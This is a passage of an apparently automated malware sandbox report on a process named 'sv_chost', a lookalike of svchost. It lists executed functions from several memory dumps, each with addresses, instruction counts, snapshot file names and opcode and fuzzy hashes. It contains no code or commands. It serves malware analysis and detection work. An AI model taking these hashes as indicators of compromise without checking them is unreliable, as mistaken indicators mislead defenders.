                                                                • Opcode ID: 33be252a98ed754c016d992c3c1b2db98f9a09174be14a0ae54998ce29f1e520
                                                                • Instruction ID: 62bf1f4fb7ca8c0bb396a646bd152deeeb1ceb37e2121eff3d58365dfd80729c
                                                                • Opcode Fuzzy Hash: 33be252a98ed754c016d992c3c1b2db98f9a09174be14a0ae54998ce29f1e520
                                                                • Instruction Fuzzy Hash: 8C311362B4D9494FD755EB6C88B59A83FB1FF94200BC584B5D09C8B3EFCE24AA41C781
                                                                Function 00007FFD9B6B2201 Relevance: .1, Instructions: 87COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.2620991857.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ffd9b6b0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b3cc490db29ed324a574d4f1943dcef412f0bfe345157a9cb3362ec557bcb833
                                                                • Instruction ID: 2bebc03015a38f26d094c0452b34b1bf2f2dc155e79a2ab646a837351e172548
                                                                • Opcode Fuzzy Hash: b3cc490db29ed324a574d4f1943dcef412f0bfe345157a9cb3362ec557bcb833
                                                                • Instruction Fuzzy Hash: 0E219A22B0DA980FE751A76CA8255303FE0EF96321B0901E6E45CCB1E7DC14BD418741

                                                                Executed Functions

                                                                Function 00007FFD9B6C1679 Relevance: .8, Instructions: 847COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000019.00000002.2724787391.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_25_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c26eaea179ba6d62812b60b7ee092b260b742f70e6caf9f3bb8c77fa3c3c8525
                                                                • Instruction ID: 1b55aedfd73fb73714737ccf1e0c62c175bb030c325541875116d6b71c329ef5
                                                                • Opcode Fuzzy Hash: c26eaea179ba6d62812b60b7ee092b260b742f70e6caf9f3bb8c77fa3c3c8525
                                                                • Instruction Fuzzy Hash: 43420931B19A094FE798FB6C88B56B977D2FF98300F454579E01EC72D6DE28B9018781
                                                                Function 00007FFD9B6C16B9 Relevance: .7, Instructions: 675COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000019.00000002.2724787391.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_25_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e29d3729a19327db8e103270b19dbb13b809282b32552f9fcdc69a68e11cb242
                                                                • Instruction ID: 8939e5e50ab6765f6e33aba34d52ec1390e9e1592b2ac69d6d770026d364bc41
                                                                • Opcode Fuzzy Hash: e29d3729a19327db8e103270b19dbb13b809282b32552f9fcdc69a68e11cb242
                                                                • Instruction Fuzzy Hash: 9322F621B199494FE7A8FB6C84B56B977D1FF98300F8544B9E01EC72DBDE28B9018781
                                                                Function 00007FFD9B6C204D Relevance: .2, Instructions: 195COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000019.00000002.2724787391.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_25_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dcce7ee6105c99ec05891b6fa8fd6535cd158ec26635b81385e220c8f44378cd
                                                                • Instruction ID: 5c7d2698dad4215d399e7457115b6a830cd56227ae8b1e2158f234515149abba
                                                                • Opcode Fuzzy Hash: dcce7ee6105c99ec05891b6fa8fd6535cd158ec26635b81385e220c8f44378cd
                                                                • Instruction Fuzzy Hash: 4D51FD10B1E6C90FE7A6BBB848746756FD1DF87219B0900FBE499CB1E7DD186806C342
                                                                Function 00007FFD9B6C1190 Relevance: .6, Instructions: 580COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000019.00000002.2724787391.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_25_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: befc14fed7d25a84543a6f0ea46d8719cce430f8d6cd48ba9248f7ea385edc72
                                                                • Instruction ID: f95ae5972e8215262bfe0a61647818594b680535a8b4576a158f9584ac83b5ae
                                                                • Opcode Fuzzy Hash: befc14fed7d25a84543a6f0ea46d8719cce430f8d6cd48ba9248f7ea385edc72
                                                                • Instruction Fuzzy Hash: 4B31C662A0D69A0FEB15B7AC88B10FA7BB1FF45350B4940B7C199CF1E3DD2879468790
                                                                Function 00007FFD9B6C0C2E Relevance: .2, Instructions: 216COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000019.00000002.2724787391.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_25_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0203e79e1eed7dda1a1612d3457d3c4308c597a3fe207c2a78f0eeae4ab40ffb
                                                                • Instruction ID: 24e04d349e1270c3723026402d37cf4a44aa4f8a80a7e6695b25065f525a2899
                                                                • Opcode Fuzzy Hash: 0203e79e1eed7dda1a1612d3457d3c4308c597a3fe207c2a78f0eeae4ab40ffb
                                                                • Instruction Fuzzy Hash: 41511511B0FACA0FE7A6AB7848651747BD1EF86614B0900FBD49CCB1EBDD18BC068352
                                                                Function 00007FFD9B6C0AC9 Relevance: .2, Instructions: 152COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000019.00000002.2724787391.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_25_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 28613739a12e160585eafe65b96c31c9beb821ffff120342d77269917b808bad
                                                                • Instruction ID: 6805cc3ac70fbb197c82a09d9a50080bcf8d4353fb8d0a3f99160c2e036acac4
                                                                • Opcode Fuzzy Hash: 28613739a12e160585eafe65b96c31c9beb821ffff120342d77269917b808bad
                                                                • Instruction Fuzzy Hash: C0412921B189094FEB44BBEC986A7BE73D2EF98701F5441B6E01CC72D7DD2868028781
                                                                Function 00007FFD9B6C0558 Relevance: .1, Instructions: 137COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000019.00000002.2724787391.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_25_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 94abe475b59c36de9dbd652f53a4c9c62358c581a249ec283a43921e74f2b7ce
                                                                • Instruction ID: f055dc85fe60827e8b583678b1accc76debd5deab216c8e7dd9d22d70d7a978f
                                                                • Opcode Fuzzy Hash: 94abe475b59c36de9dbd652f53a4c9c62358c581a249ec283a43921e74f2b7ce
                                                                • Instruction Fuzzy Hash: E4310421B1C94D0FE798FA6C986A679A7C2EFD8315F4401BEE45EC32E7DD64AC428341
                                                                Function 00007FFD9B6C0985 Relevance: .1, Instructions: 111COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000019.00000002.2724787391.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_25_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 851c54a2312dc6528416d5ca583d314354423ffa16f02a709317beb06db42396
                                                                • Instruction ID: c4a90eac45e168cbee9ce8c71fcd360534868703b429bc8247db7283d0c5ef1d
                                                                • Opcode Fuzzy Hash: 851c54a2312dc6528416d5ca583d314354423ffa16f02a709317beb06db42396
                                                                • Instruction Fuzzy Hash: 01319331B18A094FDB84FBA9C4B16FD77E1FF98300F9545B5D019D729ADE38A8018B40
                                                                Function 00007FFD9B6C082D Relevance: .1, Instructions: 106COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000019.00000002.2724787391.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_25_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8afaada08569e4d3a42d3fe6d92f337488f05ec8e2deb8a2d7552c8bb34840d4
                                                                • Instruction ID: 2a978c082fcf09772233cae74c38dcba7462d688ed94208bf17076c2f8004382
                                                                • Opcode Fuzzy Hash: 8afaada08569e4d3a42d3fe6d92f337488f05ec8e2deb8a2d7552c8bb34840d4
                                                                • Instruction Fuzzy Hash: 04311761B4E94A5FD795EF6E88F15B83FA1FF84204B8580B5D0198B3EFCE64A9018781
                                                                Function 00007FFD9B6C2201 Relevance: .1, Instructions: 87COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000019.00000002.2724787391.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_25_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4be05781741098aa620241fd35a579681e0e31b946c0bee4c1f6968f8f117fdc
                                                                • Instruction ID: 1267c48b36b52e4b90e333b02293d0a41f36704f89793480b971e94df8756d96
                                                                • Opcode Fuzzy Hash: 4be05781741098aa620241fd35a579681e0e31b946c0bee4c1f6968f8f117fdc
                                                                • Instruction Fuzzy Hash: 01216722B0DA890FE791BB6CA8605747BD0EF96320B0901F6E95DCB1EBD818BD418381

                                                                Executed Functions

                                                                Function 00007FFD9B6C1679 Relevance: .8, Instructions: 847COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000001A.00000002.2802112860.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_26_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cf3c9222bd1432746f33c97496f0908cf304c6353974a509549d179f49cda0bd
                                                                • Instruction ID: 4c63ddf337896cc18032b249246ced871b34fc75f23705e414e3b8499fe130c6
                                                                • Opcode Fuzzy Hash: cf3c9222bd1432746f33c97496f0908cf304c6353974a509549d179f49cda0bd
                                                                • Instruction Fuzzy Hash: C342E521B19A494FEB98FB6C8475AB977D2FF98300F4545B9E01EC72D6DE28B8018781
                                                                Function 00007FFD9B6C16B9 Relevance: .7, Instructions: 675COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000001A.00000002.2802112860.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_26_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 60771ed50c76c0b11e4cb278b3bf67cd65e815fa120d7954f809c4b4f9e45c74
                                                                • Instruction ID: 57ad24b2199a30ed4e458cdb490f2865cd744dcbf46a3b329f56ed5f86b34d44
                                                                • Opcode Fuzzy Hash: 60771ed50c76c0b11e4cb278b3bf67cd65e815fa120d7954f809c4b4f9e45c74
                                                                • Instruction Fuzzy Hash: B822E621B1DA494FEBA8FB6C84756B977D1FF98300F8544B9E01EC72D6CE28B8018781
                                                                Function 00007FFD9B6C204D Relevance: .2, Instructions: 195COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000001A.00000002.2802112860.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_26_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5b3501afcf3afb44be7a37d62640455f9fb061608ef015c53281dacfa3f06ee3
                                                                • Instruction ID: 439ad5fd02a2572209646b61ab81353bbae9b9c7aaa300296e7de37dac49664a
                                                                • Opcode Fuzzy Hash: 5b3501afcf3afb44be7a37d62640455f9fb061608ef015c53281dacfa3f06ee3
                                                                • Instruction Fuzzy Hash: E051FD10B1E6C90FE7A6BBB848746756FD1DF87215B0900FBE499CB1E7DD186806C342
                                                                Function 00007FFD9B6C1190 Relevance: .6, Instructions: 580COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000001A.00000002.2802112860.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_26_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 90a39bd01bce4543da48ea94372a512c07b6b977d814194cfce4dc802c4ec4fc
                                                                • Instruction ID: 48035319555ff1bb0d49fc6dd6a8aa5aba41cd2ba6659532d9f3fb8e0c59225d
                                                                • Opcode Fuzzy Hash: 90a39bd01bce4543da48ea94372a512c07b6b977d814194cfce4dc802c4ec4fc
                                                                • Instruction Fuzzy Hash: 0531E862A0D69A0FE705B7AC98B20F97BB1FF41310B4840B7C199CF1E3DD2879068750
                                                                Function 00007FFD9B6C0C2E Relevance: .2, Instructions: 216COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000001A.00000002.2802112860.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_26_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 50a10a4acbade51e86efff1a3ca407ccc0948a26dd5ffc65ab8a0149d75d7c3f
                                                                • Instruction ID: 8362f926e101a641d6aabd07656e3af3f4d5d256eaa7ec0480e9a4a8e5c8ba48
                                                                • Opcode Fuzzy Hash: 50a10a4acbade51e86efff1a3ca407ccc0948a26dd5ffc65ab8a0149d75d7c3f
                                                                • Instruction Fuzzy Hash: 51512611B0FACA0FE7A6AB7848651747BD1EF86614B0900FBD49CCB1EBDD18BC068352
                                                                Function 00007FFD9B6C0AC9 Relevance: .2, Instructions: 152COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000001A.00000002.2802112860.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_26_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7e9f2005a834ecb7e97853b8361dd2ef59858f8005e6bf113f162e749abeac0c
                                                                • Instruction ID: 7fd2f2f6802092b1573cea90017c56595e0c1ba45264784365cb79cd1e3b2972
                                                                • Opcode Fuzzy Hash: 7e9f2005a834ecb7e97853b8361dd2ef59858f8005e6bf113f162e749abeac0c
                                                                • Instruction Fuzzy Hash: A7412921B199094FEB44BBEC586A7BE73D2EF98711F5441B6E01DC72D7DE28A8028381
                                                                Function 00007FFD9B6C0558 Relevance: .1, Instructions: 137COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000001A.00000002.2802112860.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_26_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8faad2a46d656a32d90cc1ed52a9e2ef461df4fd038493fef2b22693b0a556a7
                                                                • Instruction ID: 606d27e811693fe9b974f67aa703947638a79a7d76da10d55977b0bb43b2386d
                                                                • Opcode Fuzzy Hash: 8faad2a46d656a32d90cc1ed52a9e2ef461df4fd038493fef2b22693b0a556a7
                                                                • Instruction Fuzzy Hash: DC31F321B1C94D0FE798FA6C946A679A6C2EF98315F4401BEE45EC32E7DD64AC428341
                                                                Function 00007FFD9B6C0985 Relevance: .1, Instructions: 111COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000001A.00000002.2802112860.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_26_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6382dde9b5a5a05f94a9fdc2e58766defd6b7ce49ed03c189d37a646002daec8
                                                                • Instruction ID: 40fa6adf53d28e25ca7b989885685632a453ae841261763ea1e7162d08a6c223
                                                                • Opcode Fuzzy Hash: 6382dde9b5a5a05f94a9fdc2e58766defd6b7ce49ed03c189d37a646002daec8
                                                                • Instruction Fuzzy Hash: 5A318471B19A0D4FDB48FBACC4756BD77A1FF98300F9545B9D019D729ADE3868018740
                                                                Function 00007FFD9B6C082D Relevance: .1, Instructions: 106COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000001A.00000002.2802112860.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_26_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e504124feb4746162b809a379668f133a3212013e86a68b8df562009734c9445
                                                                • Instruction ID: cd429f26748b6f654f380789bc1d19bfe8060989f5e99a14c71a2d10f06d0ee0
                                                                • Opcode Fuzzy Hash: e504124feb4746162b809a379668f133a3212013e86a68b8df562009734c9445
                                                                • Instruction Fuzzy Hash: 7731D361B4EA4A4FDB58EB6C44B59B83FA1FF84200BC580BDD0198B3DFCE24A9058785
                                                                Function 00007FFD9B6C2201 Relevance: .1, Instructions: 87COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000001A.00000002.2802112860.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_26_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b1d754591e368796cf50c8e80e24404214bf7037c56d380a95f6e2232adb9e32
                                                                • Instruction ID: a527ced170b94cd499b29feb1fda54c87f161d637f1be3bc991a5d1ed50157a3
                                                                • Opcode Fuzzy Hash: b1d754591e368796cf50c8e80e24404214bf7037c56d380a95f6e2232adb9e32
                                                                • Instruction Fuzzy Hash: A6217922F0DA890FE795BB6CA8605347BD0EF96320B0901FAE85DCB1E7DC18BD418381